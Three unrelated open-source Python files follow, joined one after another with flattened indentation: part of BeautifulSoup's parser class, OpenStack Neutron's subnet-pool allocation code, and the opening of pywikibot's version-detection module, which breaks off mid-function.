GuessedAtParserWarning, stacklevel=2
)
else:
if kwargs:
warnings.warn("Keyword arguments to the BeautifulSoup constructor will be ignored. These would normally be passed into the TreeBuilder constructor, but a TreeBuilder instance was passed in as `builder`.")
self.builder = builder
self.is_xml = builder.is_xml
self.known_xml = self.is_xml
self._namespaces = dict()
self.parse_only = parse_only
self.builder.initialize_soup(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
elif len(markup) <= 256 and (
(isinstance(markup, bytes) and not b'<' in markup)
or (isinstance(markup, str) and not '<' in markup)
):
# Print out warnings for a couple beginner problems
# involving passing non-markup to Beautiful Soup.
# Beautiful Soup will still parse the input as markup,
# just in case that's what the user really wants.
if (isinstance(markup, str)
and not os.path.supports_unicode_filenames):
possible_filename = markup.encode("utf8")
else:
possible_filename = markup
is_file = False
try:
is_file = os.path.exists(possible_filename)
except Exception as e:
# This is almost certainly a problem involving
# characters not valid in filenames on this
# system. Just let it go.
pass
if is_file:
warnings.warn(
'"%s" looks like a filename, not markup. You should'
' probably open this file and pass the filehandle into'
' Beautiful Soup.' % self._decode_markup(markup),
MarkupResemblesLocatorWarning
)
self._check_markup_is_url(markup)
rejections = []
success = False
for (self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) in (
self.builder.prepare_markup(
markup, from_encoding, exclude_encodings=exclude_encodings)):
self.reset()
try:
self._feed()
success = True
break
except ParserRejectedMarkup as e:
rejections.append(e)
pass
if not success:
other_exceptions = [str(e) for e in rejections]
raise ParserRejectedMarkup(
"The markup you provided was rejected by the parser. Trying a different parser or a different encoding may help.\n\nOriginal exception(s) from parser:\n " + "\n ".join(other_exceptions)
)
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def __copy__(self):
"""Copy a BeautifulSoup object by converting the document to a string and parsing it again."""
copy = type(self)(
self.encode('utf-8'), builder=self.builder, from_encoding='utf-8'
)
# Although we encoded the tree to UTF-8, that may not have
# been the encoding of the original markup. Set the copy's
# .original_encoding to reflect the original object's
# .original_encoding.
copy.original_encoding = self.original_encoding
return copy
def __getstate__(self):
# Frequently a tree builder can't be pickled.
d = dict(self.__dict__)
if 'builder' in d and not self.builder.picklable:
d['builder'] = None
return d
@classmethod
def _decode_markup(cls, markup):
"""Ensure `markup` is bytes so it's safe to send into warnings.warn.
TODO: warnings.warn had this problem back in 2010 but it might not
anymore.
"""
if isinstance(markup, bytes):
decoded = markup.decode('utf-8', 'replace')
else:
decoded = markup
return decoded
@classmethod
def _check_markup_is_url(cls, markup):
"""Error-handling method to raise a warning if incoming markup looks
like a URL.
:param markup: A string.
"""
if isinstance(markup, bytes):
space = b' '
cant_start_with = (b"http:", b"https:")
elif isinstance(markup, str):
space = ' '
cant_start_with = ("http:", "https:")
else:
return
if any(markup.startswith(prefix) for prefix in cant_start_with):
if not space in markup:
warnings.warn(
'"%s" looks like a URL. Beautiful Soup is not an'
' HTTP client. You should probably use an HTTP client like'
' requests to get the document behind the URL, and feed'
' that document to Beautiful Soup.' % cls._decode_markup(
markup
),
MarkupResemblesLocatorWarning
)
def _feed(self):
"""Internal method that parses previously set markup, creating a large
number of Tag and NavigableString objects.
"""
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
"""Reset this object to a state as though it had never parsed any
markup.
"""
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.current_data = []
self.currentTag = None
self.tagStack = []
self.open_tag_counter = Counter()
self.preserve_whitespace_tag_stack = []
self.string_container_stack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, attrs={},
sourceline=None, sourcepos=None, **kwattrs):
"""Create a new Tag associated with this BeautifulSoup object.
:param name: The name of the new Tag.
:param namespace: The URI of the new Tag's XML namespace, if any.
:param prefix: The prefix for the new Tag's XML namespace, if any.
:param attrs: A dictionary of this Tag's attribute values; can
be used instead of `kwattrs` for attributes like 'class'
that are reserved words in Python.
:param sourceline: The line number where this tag was
(purportedly) found in its source document.
:param sourcepos: The character position within `sourceline` where this
tag was (purportedly) found.
:param kwattrs: Keyword arguments for the new Tag's attribute values.
"""
kwattrs.update(attrs)
return self.element_classes.get(Tag, Tag)(
None, self.builder, name, namespace, nsprefix, kwattrs,
sourceline=sourceline, sourcepos=sourcepos
)
def string_container(self, base_class=None):
container = base_class or NavigableString
# There may be a general override of NavigableString.
container = self.element_classes.get(
container, container
)
# On top of that, we may be inside a tag that needs a special
# container class.
if self.string_container_stack:
container = self.builder.string_containers.get(
self.string_container_stack[-1].name, container
)
return container
def new_string(self, s, subclass=None):
"""Create a new NavigableString associated with this BeautifulSoup
object.
"""
container = self.string_container(subclass)
return container(s)
def insert_before(self, *args):
"""This method is part of the PageElement API, but `BeautifulSoup` doesn't implement
it because there is nothing before or after it in the parse tree.
"""
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, *args):
"""This method is part of the PageElement API, but `BeautifulSoup` doesn't implement
it because there is nothing before or after it in the parse tree.
"""
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
"""Internal method called by _popToTag when a tag is closed."""
tag = self.tagStack.pop()
if tag.name in self.open_tag_counter:
self.open_tag_counter[tag.name] -= 1
if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
self.preserve_whitespace_tag_stack.pop()
if self.string_container_stack and tag == self.string_container_stack[-1]:
self.string_container_stack.pop()
#print("Pop", tag.name)
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
"""Internal method called by handle_starttag when a tag is opened."""
#print("Push", tag.name)
if self.currentTag is not None:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
if tag.name != self.ROOT_TAG_NAME:
self.open_tag_counter[tag.name] += 1
if tag.name in self.builder.preserve_whitespace_tags:
self.preserve_whitespace_tag_stack.append(tag)
if tag.name in self.builder.string_containers:
self.string_container_stack.append(tag)
def endData(self, containerClass=None):
"""Method called by the TreeBuilder when the end of a data segment
occurs.
"""
containerClass = self.string_container(containerClass)
if self.current_data:
current_data = ''.join(self.current_data)
# If whitespace is not preserved, and this string contains
# nothing but ASCII spaces, replace it with a single space
# or newline.
if not self.preserve_whitespace_tag_stack:
strippable = True
for i in current_data:
if i not in self.ASCII_SPACES:
strippable = False
break
if strippable:
if '\n' in current_data:
current_data = '\n'
else:
current_data = ' '
# Reset the data collector.
self.current_data = []
# Should we add this string to the tree at all?
if self.parse_only and len(self.tagStack) <= 1 and \
(not self.parse_only.text or \
not self.parse_only.search(current_data)):
return
o = containerClass(current_data)
self.object_was_parsed(o)
def object_was_parsed(self, o, parent=None, most_recent_element=None):
"""Method called by the TreeBuilder to integrate an object into the parse tree."""
if parent is None:
parent = self.currentTag
if most_recent_element is not None:
previous_element = most_recent_element
else:
previous_element = self._most_recent_element
next_element = previous_sibling = next_sibling = None
if isinstance(o, Tag):
next_element = o.next_element
next_sibling = o.next_sibling
previous_sibling = o.previous_sibling
if previous_element is None:
previous_element = o.previous_element
fix = parent.next_element is not None
o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
self._most_recent_element = o
parent.contents.append(o)
# Check if we are inserting into an already parsed node.
if fix:
self._linkage_fixer(parent)
def _linkage_fixer(self, el):
"""Make sure linkage of this fragment is sound."""
first = el.contents[0]
child = el.contents[-1]
descendant = child
if child is first and el.parent is not None:
# Parent should be linked to first child
el.next_element = child
# We are no longer linked to whatever this element is
prev_el = child.previous_element
if prev_el is not None and prev_el is not el:
prev_el.next_element = None
# First child should be linked to the parent, and no previous siblings.
child.previous_element = el
child.previous_sibling = None
# We have no sibling as we've been appended as the last.
child.next_sibling = None
# This index is a tag, dig deeper for a "last descendant"
if isinstance(child, Tag) and child.contents:
descendant = child._last_descendant(False)
# As the final step, link last descendant. It should be linked
# to the parent's next sibling (if found), else walk up the chain
# and find a parent with a sibling. It should have no next sibling.
descendant.next_element = None
descendant.next_sibling = None
target = el
while True:
if target is None:
break
elif target.next_sibling is not None:
descendant.next_element = target.next_sibling
target.next_sibling.previous_element = child
break
target = target.parent
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag.
If there are no open tags with the given name, nothing will be
popped.
:param name: Pop up to the most recent tag with this name.
:param nsprefix: The namespace prefix that goes with `name`.
:param inclusivePop: It this is false, pops the tag stack up
to but *not* including the most recent instqance of the
given tag.
"""
#print("Popping to %s" % name)
if name == self.ROOT_TAG_NAME:
# The BeautifulSoup object itself can never be popped.
return
most_recently_popped = None
stack_size = len(self.tagStack)
for i in range(stack_size - 1, 0, -1):
if not self.open_tag_counter.get(name):
break
t = self.tagStack[i]
if (name == t.name and nsprefix == t.prefix):
if inclusivePop:
most_recently_popped = self.popTag()
break
most_recently_popped = self.popTag()
return most_recently_popped
def handle_starttag(self, name, namespace, nsprefix, attrs, sourceline=None,
sourcepos=None):
"""Called by the tree builder when a new tag is encountered.
:param name: Name of the tag.
:param nsprefix: Namespace prefix for the tag.
:param attrs: A dictionary of attribute values.
:param sourceline: The line number where this tag was found in its
source document.
:param sourcepos: The character position within `sourceline` where this
tag was found.
If this method returns None, the tag was rejected by an active
SoupStrainer. You should proceed as if the tag had not occurred
in the document. For instance, if this was a self-closing tag,
don't call handle_endtag.
"""
# print("Start tag %s: %s" % (name, attrs))
self.endData()
if (self.parse_only and len(self.tagStack) <= 1
and (self.parse_only.text
or not self.parse_only.search_tag(name, attrs))):
return None
tag = self.element_classes.get(Tag, Tag)(
self, self.builder, name, namespace, nsprefix, attrs,
self.currentTag, self._most_recent_element,
sourceline=sourceline, sourcepos=sourcepos
)
if tag is None:
return tag
if self._most_recent_element is not None:
self._most_recent_element.next_element = tag
self._most_recent_element = tag
self.pushTag(tag)
return tag
def handle_endtag(self, name, nsprefix=None):
"""Called by the tree builder when an ending tag is encountered.
:param name: Name of the tag.
:param nsprefix: Namespace prefix for the tag.
"""
#print("End tag: " + name)
self.endData()
self._popToTag(name, nsprefix)
def handle_data(self, data):
"""Called by the tree builder when a chunk of textual data is encountered."""
self.current_data.append(data)
def decode(self, pretty_print=False,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
formatter="minimal"):
"""Returns a string or Unicode representation of the parse tree
as an HTML or XML document.
:param pretty_print: If this is True, indentation will be used to
make the document more readable.
:param eventual_encoding: The encoding of the final document.
If this is None, the document will be a Unicode string.
"""
if self.is_xml:
# Print the XML declaration
encoding_part = ''
if eventual_encoding in PYTHON_SPECIFIC_ENCODINGS:
# This is a special Python encoding; it can't actually
# go into an XML document because it means nothing
# outside of Python.
eventual_encoding = None
if eventual_encoding != None:
encoding_part = ' encoding="%s"' % eventual_encoding
prefix = '<?xml version="1.0"%s?>\n' % encoding_part
else:
prefix = ''
if not pretty_print:
indent_level = None
else:
indent_level = 0
return prefix + super(BeautifulSoup, self).decode(
indent_level, eventual_encoding, formatter)
# Aliases to make it easier to get started quickly, e.g. 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
"""Deprecated interface to an XML parser."""
def __init__(self, *args, **kwargs):
kwargs['features'] = 'xml'
warnings.warn(
'The BeautifulStoneSoup class is deprecated. Instead of using '
'it, pass features="xml" into the BeautifulSoup constructor.')
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
"""Exception raised by a TreeBuilder if it's unable to continue parsing."""
pass
class FeatureNotFound(ValueError):
"""Exception raised by the BeautifulSoup constructor if no parser with the
requested features is found.
"""
pass
#If this file is run as a script, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print((soup.prettify()))
|
|
# Copyright (c) 2015 Hewlett-Packard Co.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import operator
import netaddr
from oslo_db import exception as db_exc
from oslo_utils import uuidutils
from neutron._i18n import _
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.common import exceptions as n_exc
from neutron.db import models_v2
from neutron.ipam import driver
from neutron.ipam import requests as ipam_req
from neutron.ipam import utils as ipam_utils
class SubnetAllocator(driver.Pool):
"""Class for handling allocation of subnet prefixes from a subnet pool.
This class leverages the pluggable IPAM interface where possible to
make merging into IPAM framework easier in future cycles.
"""
def __init__(self, subnetpool, context):
super(SubnetAllocator, self).__init__(subnetpool, context)
self._sp_helper = SubnetPoolHelper()
def _lock_subnetpool(self):
"""Lock subnetpool associated row.
This method disallows to allocate concurrently 2 subnets in the same
subnetpool, it's required to ensure non-overlapping cidrs in the same
subnetpool.
"""
current_hash = (self._context.session.query(models_v2.SubnetPool.hash)
.filter_by(id=self._subnetpool['id']).scalar())
if current_hash is None:
# NOTE(cbrandily): subnetpool has been deleted
raise n_exc.SubnetPoolNotFound(
subnetpool_id=self._subnetpool['id'])
new_hash = uuidutils.generate_uuid()
# NOTE(cbrandily): the update disallows 2 concurrent subnet allocation
# to succeed: at most 1 transaction will succeed, others will be
# rolled back and be caught in neutron.db.v2.base
query = self._context.session.query(models_v2.SubnetPool).filter_by(
id=self._subnetpool['id'], hash=current_hash)
count = query.update({'hash': new_hash})
if not count:
raise db_exc.RetryRequest(n_exc.SubnetPoolInUse(
subnet_pool_id=self._subnetpool['id']))
def _get_allocated_cidrs(self):
query = self._context.session.query(models_v2.Subnet)
subnets = query.filter_by(subnetpool_id=self._subnetpool['id'])
return (x.cidr for x in subnets)
def _get_available_prefix_list(self):
prefixes = (x.cidr for x in self._subnetpool.prefixes)
allocations = self._get_allocated_cidrs()
prefix_set = netaddr.IPSet(iterable=prefixes)
allocation_set = netaddr.IPSet(iterable=allocations)
available_set = prefix_set.difference(allocation_set)
available_set.compact()
return sorted(available_set.iter_cidrs(),
key=operator.attrgetter('prefixlen'),
reverse=True)
def _num_quota_units_in_prefixlen(self, prefixlen, quota_unit):
return math.pow(2, quota_unit - prefixlen)
def _allocations_used_by_tenant(self, quota_unit):
subnetpool_id = self._subnetpool['id']
tenant_id = self._subnetpool['tenant_id']
with self._context.session.begin(subtransactions=True):
qry = self._context.session.query(models_v2.Subnet)
allocations = qry.filter_by(subnetpool_id=subnetpool_id,
tenant_id=tenant_id)
value = 0
for allocation in allocations:
prefixlen = netaddr.IPNetwork(allocation.cidr).prefixlen
value += self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
return value
def _check_subnetpool_tenant_quota(self, tenant_id, prefixlen):
quota_unit = self._sp_helper.ip_version_subnetpool_quota_unit(
self._subnetpool['ip_version'])
quota = self._subnetpool.get('default_quota')
if quota:
used = self._allocations_used_by_tenant(quota_unit)
requested_units = self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
if used + requested_units > quota:
raise n_exc.SubnetPoolQuotaExceeded()
def _allocate_any_subnet(self, request):
with self._context.session.begin(subtransactions=True):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
prefix_pool = self._get_available_prefix_list()
for prefix in prefix_pool:
if request.prefixlen >= prefix.prefixlen:
subnet = next(prefix.subnet(request.prefixlen))
gateway_ip = request.gateway_ip
if not gateway_ip:
gateway_ip = subnet.network + 1
pools = ipam_utils.generate_pools(subnet.cidr,
gateway_ip)
return IpamSubnet(request.tenant_id,
request.subnet_id,
subnet.cidr,
gateway_ip=gateway_ip,
allocation_pools=pools)
msg = _("Insufficient prefix space to allocate subnet size /%s")
raise n_exc.SubnetAllocationError(reason=msg %
str(request.prefixlen))
def _allocate_specific_subnet(self, request):
with self._context.session.begin(subtransactions=True):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
cidr = request.subnet_cidr
available = self._get_available_prefix_list()
matched = netaddr.all_matching_cidrs(cidr, available)
if len(matched) is 1 and matched[0].prefixlen <= cidr.prefixlen:
return IpamSubnet(request.tenant_id,
request.subnet_id,
cidr,
gateway_ip=request.gateway_ip,
allocation_pools=request.allocation_pools)
msg = _("Cannot allocate requested subnet from the available "
"set of prefixes")
raise n_exc.SubnetAllocationError(reason=msg)
def allocate_subnet(self, request):
max_prefixlen = int(self._subnetpool['max_prefixlen'])
min_prefixlen = int(self._subnetpool['min_prefixlen'])
if request.prefixlen > max_prefixlen:
raise n_exc.MaxPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
max_prefixlen=max_prefixlen)
if request.prefixlen < min_prefixlen:
raise n_exc.MinPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
min_prefixlen=min_prefixlen)
if isinstance(request, ipam_req.AnySubnetRequest):
return self._allocate_any_subnet(request)
elif isinstance(request, ipam_req.SpecificSubnetRequest):
return self._allocate_specific_subnet(request)
else:
msg = _("Unsupported request type")
raise n_exc.SubnetAllocationError(reason=msg)
def get_subnet(self, subnet_id):
raise NotImplementedError()
def update_subnet(self, request):
raise NotImplementedError()
def remove_subnet(self, subnet_id):
raise NotImplementedError()
class IpamSubnet(driver.Subnet):
def __init__(self,
tenant_id,
subnet_id,
cidr,
gateway_ip=None,
allocation_pools=None):
self._req = ipam_req.SpecificSubnetRequest(
tenant_id,
subnet_id,
cidr,
gateway_ip=gateway_ip,
allocation_pools=allocation_pools)
def allocate(self, address_request):
raise NotImplementedError()
def deallocate(self, address):
raise NotImplementedError()
def get_details(self):
return self._req
class SubnetPoolReader(object):
'''Class to assist with reading a subnetpool, loading defaults, and
inferring IP version from prefix list. Provides a common way of
reading a stored model or a create request with default table
attributes.
'''
MIN_PREFIX_TYPE = 'min'
MAX_PREFIX_TYPE = 'max'
DEFAULT_PREFIX_TYPE = 'default'
_sp_helper = None
def __init__(self, subnetpool):
self._read_prefix_info(subnetpool)
self._sp_helper = SubnetPoolHelper()
self._read_id(subnetpool)
self._read_prefix_bounds(subnetpool)
self._read_attrs(subnetpool,
['tenant_id', 'name', 'is_default', 'shared'])
self.description = subnetpool.get('description')
self._read_address_scope(subnetpool)
self.subnetpool = {'id': self.id,
'name': self.name,
'tenant_id': self.tenant_id,
'prefixes': self.prefixes,
'min_prefix': self.min_prefix,
'min_prefixlen': self.min_prefixlen,
'max_prefix': self.max_prefix,
'max_prefixlen': self.max_prefixlen,
'default_prefix': self.default_prefix,
'default_prefixlen': self.default_prefixlen,
'default_quota': self.default_quota,
'address_scope_id': self.address_scope_id,
'is_default': self.is_default,
'shared': self.shared,
'description': self.description}
def _read_attrs(self, subnetpool, keys):
for key in keys:
setattr(self, key, subnetpool[key])
def _ip_version_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).version
def _prefixlen_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).prefixlen
def _read_id(self, subnetpool):
id = subnetpool.get('id', attributes.ATTR_NOT_SPECIFIED)
if id is attributes.ATTR_NOT_SPECIFIED:
id = uuidutils.generate_uuid()
self.id = id
def _read_prefix_bounds(self, subnetpool):
ip_version = self.ip_version
default_min = self._sp_helper.default_min_prefixlen(ip_version)
default_max = self._sp_helper.default_max_prefixlen(ip_version)
self._read_prefix_bound(self.MIN_PREFIX_TYPE,
subnetpool,
default_min)
self._read_prefix_bound(self.MAX_PREFIX_TYPE,
subnetpool,
default_max)
self._read_prefix_bound(self.DEFAULT_PREFIX_TYPE,
subnetpool,
self.min_prefixlen)
self._sp_helper.validate_min_prefixlen(self.min_prefixlen,
self.max_prefixlen)
self._sp_helper.validate_max_prefixlen(self.max_prefixlen,
ip_version)
self._sp_helper.validate_default_prefixlen(self.min_prefixlen,
self.max_prefixlen,
self.default_prefixlen)
def _read_prefix_bound(self, type, subnetpool, default_bound=None):
prefixlen_attr = type + '_prefixlen'
prefix_attr = type + '_prefix'
prefixlen = subnetpool.get(prefixlen_attr,
attributes.ATTR_NOT_SPECIFIED)
wildcard = self._sp_helper.wildcard(self.ip_version)
if prefixlen is attributes.ATTR_NOT_SPECIFIED and default_bound:
prefixlen = default_bound
if prefixlen is not attributes.ATTR_NOT_SPECIFIED:
prefix_cidr = '/'.join((wildcard,
str(prefixlen)))
setattr(self, prefix_attr, prefix_cidr)
setattr(self, prefixlen_attr, prefixlen)
def _read_prefix_info(self, subnetpool):
prefix_list = subnetpool['prefixes']
if not prefix_list:
raise n_exc.EmptySubnetPoolPrefixList()
ip_version = None
for prefix in prefix_list:
if not ip_version:
ip_version = netaddr.IPNetwork(prefix).version
elif netaddr.IPNetwork(prefix).version != ip_version:
raise n_exc.PrefixVersionMismatch()
self.default_quota = subnetpool.get('default_quota')
if self.default_quota is attributes.ATTR_NOT_SPECIFIED:
self.default_quota = None
self.ip_version = ip_version
self.prefixes = self._compact_subnetpool_prefix_list(prefix_list)
def _read_address_scope(self, subnetpool):
self.address_scope_id = subnetpool.get('address_scope_id',
attributes.ATTR_NOT_SPECIFIED)
def _compact_subnetpool_prefix_list(self, prefix_list):
"""Compact any overlapping prefixes in prefix_list and return the
result
"""
ip_set = netaddr.IPSet()
for prefix in prefix_list:
ip_set.add(netaddr.IPNetwork(prefix))
ip_set.compact()
return [str(x.cidr) for x in ip_set.iter_cidrs()]
class SubnetPoolHelper(object):
_PREFIX_VERSION_INFO = {4: {'max_prefixlen': constants.IPv4_BITS,
'wildcard': '0.0.0.0',
'default_min_prefixlen': 8,
# IPv4 quota measured in units of /32
'quota_units': 32},
6: {'max_prefixlen': constants.IPv6_BITS,
'wildcard': '::',
'default_min_prefixlen': 64,
# IPv6 quota measured in units of /64
'quota_units': 64}}
def validate_min_prefixlen(self, min_prefixlen, max_prefixlen):
if min_prefixlen < 0:
raise n_exc.UnsupportedMinSubnetPoolPrefix(prefix=min_prefixlen,
version=4)
if min_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='min_prefixlen',
prefixlen=min_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def validate_max_prefixlen(self, prefixlen, ip_version):
max = self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
if prefixlen > max:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='max_prefixlen',
prefixlen=prefixlen,
base_prefix_type='ip_version_max',
base_prefixlen=max)
def validate_default_prefixlen(self,
min_prefixlen,
max_prefixlen,
default_prefixlen):
if default_prefixlen < min_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='min_prefixlen',
base_prefixlen=min_prefixlen)
if default_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def wildcard(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['wildcard']
def default_max_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
def default_min_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['default_min_prefixlen']
def ip_version_subnetpool_quota_unit(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['quota_units']
|
|
# -*- coding: utf-8 -*-
"""Module to determine the pywikibot version (tag, revision and date)."""
#
# (C) Merlijn 'valhallasw' van Deen, 2007-2014
# (C) xqt, 2010-2015
# (C) Pywikibot team, 2007-2015
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
import os
import sys
import time
import datetime
import subprocess
import codecs
from warnings import warn
try:
from setuptools import svn_utils
except ImportError:
try:
from setuptools_svn import svn_utils
except ImportError as e:
svn_utils = e
import pywikibot
from pywikibot import config2 as config
from pywikibot.tools import deprecated, PY2
if not PY2:
basestring = (str, )
cache = None
_logger = 'version'
class ParseError(Exception):
"""Parsing went wrong."""
def _get_program_dir():
_program_dir = os.path.normpath(os.path.split(os.path.dirname(__file__))[0])
return _program_dir
def getversion(online=True):
"""Return a pywikibot version string.
@param online: (optional) Include information obtained online
"""
data = dict(getversiondict()) # copy dict to prevent changes in 'cache'
data['cmp_ver'] = 'n/a'
if online:
try:
hsh2 = getversion_onlinerepo()
hsh1 = data['hsh']
data['cmp_ver'] = 'OUTDATED' if hsh1 != hsh2 else 'ok'
except Exception:
pass
data['hsh'] = data['hsh'][:7] # make short hash from full hash
return '%(tag)s (%(hsh)s, %(rev)s, %(date)s, %(cmp_ver)s)' % data
def getversiondict():
"""Get version info for the package.
@return:
- tag (name for the repository),
- rev (current revision identifier),
- date (date of current revision),
- hash (git hash for the current revision)
@rtype: C{dict} of four C{str}
"""
global cache
if cache:
return cache
_program_dir = _get_program_dir()
exceptions = {}
for vcs_func in (getversion_git,
getversion_svn_setuptools,
getversion_nightly,
getversion_svn,
getversion_package):
try:
(tag, rev, date, hsh) = vcs_func(_program_dir)
except Exception as e:
exceptions[vcs_func] = e
else:
break
else:
# nothing worked; version unknown (but suppress exceptions)
# the value is most likely '$Id' + '$', it means that
# pywikibot was imported without using version control at all.
tag, rev, date, hsh = (
'', '-1 (unknown)', '0 (unknown)', '(unknown)')
# git and svn can silently fail, as it may be a nightly.
if getversion_package in exceptions:
warn('Unable to detect version; exceptions raised:\n%r'
% exceptions, UserWarning)
elif exceptions:
pywikibot.debug('version algorithm exceptions:\n%r'
% exceptions, _logger)
if isinstance(date, basestring):
datestring = date
elif isinstance(date, time.struct_time):
datestring = time.strftime('%Y/%m/%d, %H:%M:%S', date)
else:
warn('Unable to detect package date', UserWarning)
datestring = '-2 (unknown)'
cache = dict(tag=tag, rev=rev, date=datestring, hsh=hsh)
return cache
@deprecated('getversion_svn_setuptools')
def svn_rev_info(path):
"""Fetch information about the current revision of an Subversion checkout.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
@rtype: C{tuple} of two C{str} and a C{time.struct_time}
"""
if not os.path.isdir(os.path.join(path, '.svn')):
path = os.path.join(path, '..')
_program_dir = path
filename = os.path.join(_program_dir, '.svn/entries')
if os.path.isfile(filename):
with open(filename) as entries:
version = entries.readline().strip()
if version != '12':
for i in range(3):
entries.readline()
tag = entries.readline().strip()
t = tag.split('://')
t[1] = t[1].replace('svn.wikimedia.org/svnroot/pywikipedia/',
'')
tag = '[%s] %s' % (t[0], t[1])
for i in range(4):
entries.readline()
date = time.strptime(entries.readline()[:19],
'%Y-%m-%dT%H:%M:%S')
rev = entries.readline()[:-1]
return tag, rev, date
# We haven't found the information in entries file.
# Use sqlite table for new entries format
from sqlite3 import dbapi2 as sqlite
con = sqlite.connect(os.path.join(_program_dir, ".svn/wc.db"))
cur = con.cursor()
cur.execute("""select
local_relpath, repos_path, revision, changed_date, checksum from nodes
order by revision desc, changed_date desc""")
name, tag, rev, date, checksum = cur.fetchone()
cur.execute("select root from repository")
tag, = cur.fetchone()
con.close()
tag = os.path.split(tag)[1]
date = time.gmtime(date / 1000000)
return tag, rev, date
def github_svn_rev2hash(tag, rev):
"""Convert a Subversion revision to a Git hash using Github.
@param tag: name of the Subversion repo on Github
@param rev: Subversion revision identifier
@return: the git hash
@rtype: str
"""
from io import StringIO
import xml.dom.minidom
from pywikibot.comms import http
uri = 'https://github.com/wikimedia/%s/!svn/vcc/default' % tag
request = http.fetch(uri=uri, method='PROPFIND',
body="<?xml version='1.0' encoding='utf-8'?>"
"<propfind xmlns=\"DAV:\"><allprop/></propfind>",
headers={'label': str(rev),
'user-agent': 'SVN/1.7.5 {pwb}'})
data = request.content
dom = xml.dom.minidom.parse(StringIO(data))
hsh = dom.getElementsByTagName("C:git-commit")[0].firstChild.nodeValue
date = dom.getElementsByTagName("S:date")[0].firstChild.nodeValue
date = time.strptime(date[:19], '%Y-%m-%dT%H:%M:%S')
return hsh, date
def getversion_svn_setuptools(path=None):
"""Get version info for a Subversion checkout using setuptools.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
- hash (git hash for the Subversion revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
if isinstance(svn_utils, Exception):
raise svn_utils
tag = 'pywikibot-core'
_program_dir = path or _get_program_dir()
svninfo = svn_utils.SvnInfo(_program_dir)
rev = svninfo.get_revision()
if not isinstance(rev, int):
raise TypeError('SvnInfo.get_revision() returned type %s' % type(rev))
if rev < 0:
raise ValueError('SvnInfo.get_revision() returned %d' % rev)
if rev == 0:
raise ParseError('SvnInfo: invalid workarea')
hsh, date = github_svn_rev2hash(tag, rev)
rev = 's%s' % rev
return (tag, rev, date, hsh)
@deprecated('getversion_svn_setuptools')
def getversion_svn(path=None):
"""Get version info for a Subversion checkout.
@param path: directory of the Subversion checkout
@return:
- tag (name for the repository),
- rev (current Subversion revision identifier),
- date (date of current revision),
- hash (git hash for the Subversion revision)
@rtype: C{tuple} of three C{str} and a C{time.struct_time}
"""
_program_dir = path or _get_program_dir()
tag, rev, date = svn_rev_info(_program_dir)
hsh, date2 = github_svn_rev2hash(tag, rev)
if date.tm_isdst >= 0 and date2.tm_isdst >= 0:
assert date == date2, 'Date of version is not consistent'
# date.tm_isdst is -1 means unknown state
# compare its contents except daylight saving time status
else:
for i in range(date.n_fields - 1):
assert date[i] == date2[i], 'Date of version is not consistent'
rev = 's%s' % rev
if (not date or not tag or not rev) and not path:
raise ParseError
